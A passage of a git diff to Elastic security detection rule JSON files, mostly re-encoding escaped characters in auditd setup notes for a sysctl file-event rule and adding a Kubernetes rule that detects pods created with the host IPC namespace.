/etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
+ "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
 "query": "file where host.os.type == \"linux\" and event.action in (\"opened-file\", \"read-file\", \"wrote-to-file\") and\nfile.path : (\"/etc/sysctl.conf\", \"/etc/sysctl.d\", \"/etc/sysctl.d/*\") and not process.name == \"auditbeat\"\n",
 "required_fields": [
 {
@@ -38,7 +38,7 @@
 ],
 "risk_score": 21,
 "rule_id": "7592c127-89fb-4209-a8f6-f9944dfd7e02",
- "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
+ "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
 "severity": "low",
 "tags": [
 "OS: Linux",
@@ -47,7 +47,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_103.json b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_103.json
index beb3b10e3fe..4bded2e386b 100644
--- a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_103.json
@@ -20,7 +20,7 @@
 "process.executable",
 "file.path"
 ],
- "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
+ "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
 "query": "host.os.type:linux and event.category:file and event.action:(\"opened-file\" or \"read-file\" or \"wrote-to-file\") and\nfile.path : (\"/etc/sysctl.conf\" or \"/etc/sysctl.d\" or /etc/sysctl.d/*)\n",
 "required_fields": [
 {
@@ -46,7 +46,7 @@
 ],
 "risk_score": 21,
 "rule_id": "7592c127-89fb-4209-a8f6-f9944dfd7e02",
- "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
+ "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
 "severity": "low",
 "tags": [
 "OS: Linux",
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_104.json b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_104.json
index 45f18744d01..cc2a4431873 100644
--- a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_104.json
@@ -45,7 +45,7 @@
 ],
 "risk_score": 21,
 "rule_id": "7592c127-89fb-4209-a8f6-f9944dfd7e02",
- "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n",
+ "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n",
 "severity": "low",
 "tags": [
 "OS: Linux",
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_2.json b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_2.json
index 5150d488cfe..5e736fdac1a 100644
--- a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_2.json
@@ -12,7 +12,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious Sysctl File Event",
- "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
+ "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
 "query": "file where host.os.type == \"linux\" and event.action in (\"opened-file\", \"read-file\", \"wrote-to-file\") and\nfile.path : (\"/etc/sysctl.conf\", \"/etc/sysctl.d\", \"/etc/sysctl.d/*\") and \nnot process.name in (\"auditbeat\", \"systemd-sysctl\")\n",
 "required_fields": [
 {
@@ -38,7 +38,7 @@
 ],
 "risk_score": 21,
 "rule_id": "7592c127-89fb-4209-a8f6-f9944dfd7e02",
- "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
+ "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
 "severity": "low",
 "tags": [
 "OS: Linux",
@@ -47,7 +47,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_3.json b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_3.json
index f142ab7d198..40e983384b8 100644
--- a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_3.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Sysctl File Event", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "file where host.os.type == \"linux\" and event.action in (\"opened-file\", \"read-file\", \"wrote-to-file\") and\nfile.path : (\"/etc/sysctl.conf\", \"/etc/sysctl.d\", \"/etc/sysctl.d/*\") and \nnot process.name in (\"auditbeat\", \"systemd-sysctl\", \"dpkg\", \"dnf\", \"yum\", \"rpm\", \"apt\")\n", "required_fields": [ { 
@@ -40,7 +40,7 @@ ], "risk_score": 21, "rule_id": "7592c127-89fb-4209-a8f6-f9944dfd7e02", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/75dcb176-a575-4e33-a020-4a52aaa1b593_1.json b/packages/security_detection_engine/kibana/security_rule/75dcb176-a575-4e33-a020-4a52aaa1b593_1.json index 1597dea37bd..3d9c6e7db97 100644 --- a/packages/security_detection_engine/kibana/security_rule/75dcb176-a575-4e33-a020-4a52aaa1b593_1.json +++ b/packages/security_detection_engine/kibana/security_rule/75dcb176-a575-4e33-a020-4a52aaa1b593_1.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
@@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_101.json b/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_101.json index c14d5bba1c1..2f5da7c7032 100644 --- a/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_101.json +++ b/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_101.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_102.json b/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_102.json index 8d9bd083a76..ff168f7400b 100644 --- a/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_102.json +++ b/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_102.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_103.json b/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_103.json index f28cc668a29..99d2986e328 100644 --- a/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_103.json +++ b/packages/security_detection_engine/kibana/security_rule/76152ca1-71d0-4003-9e37-0983e12832da_103.json 
@@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_201.json b/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_201.json index 0e742c1012f..91e6c0bfea3 100644 --- a/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_201.json +++ b/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_201.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_202.json b/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_202.json index 78071b55cbb..e2e4546f168 100644 --- a/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_202.json +++ b/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_202.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_203.json b/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_203.json new file mode 100644 index 00000000000..8c5c79ad465 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/764c8437-a581-4537-8060-1fdb0e92c92d_203.json 
@@ -0,0 +1,108 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule detects an attempt to create or modify a pod using the host IPC namespace. This gives access to data used by any pod that also use the hosts IPC namespace. If any process on the host or any processes in a pod uses the hosts inter-process communication mechanisms (shared memory, semaphore arrays, message queues, etc.), an attacker can read/write to those same mechanisms. They may look for files in /dev/shm or use ipcs to check for any IPC facilities being used.",
+ "false_positives": [
+ "An administrator or developer may want to use a pod that runs as root and shares the host's IPC, Network, and PID namespaces for debugging purposes. If something is going wrong in the cluster and there is no easy way to SSH onto the host nodes directly, a privileged pod of this nature can be useful for viewing things like iptable rules and network namespaces from the host's perspective. Add exceptions for trusted container images using the query field \"kubernetes.audit.requestObject.spec.container.image\""
+ ],
+ "index": [
+ "logs-kubernetes.*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Kubernetes Pod Created With HostIPC",
+ "note": "",
+ "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.objectRef.resource:\"pods\"\n and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\")\n and kubernetes.audit.requestObject.spec.hostIPC:true\n and not kubernetes.audit.requestObject.spec.containers.image: (\"docker.elastic.co/beats/elastic-agent:8.4.0\")\n",
+ "references": [
+ "https://research.nccgroup.com/2021/11/10/detection-engineering-for-kubernetes-clusters/#part3-kubernetes-detections",
+ "https://kubernetes.io/docs/concepts/security/pod-security-policy/#host-namespaces",
+ "https://bishopfox.com/blog/kubernetes-pod-privilege-escalation"
+ ],
+ "related_integrations": [
+ {
+ "package": "kubernetes",
+ "version": "^1.4.1"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.annotations.authorization_k8s_io/decision",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.objectRef.resource",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.requestObject.spec.containers.image",
+ "type": "text"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.requestObject.spec.hostIPC",
+ "type": "boolean"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.verb",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
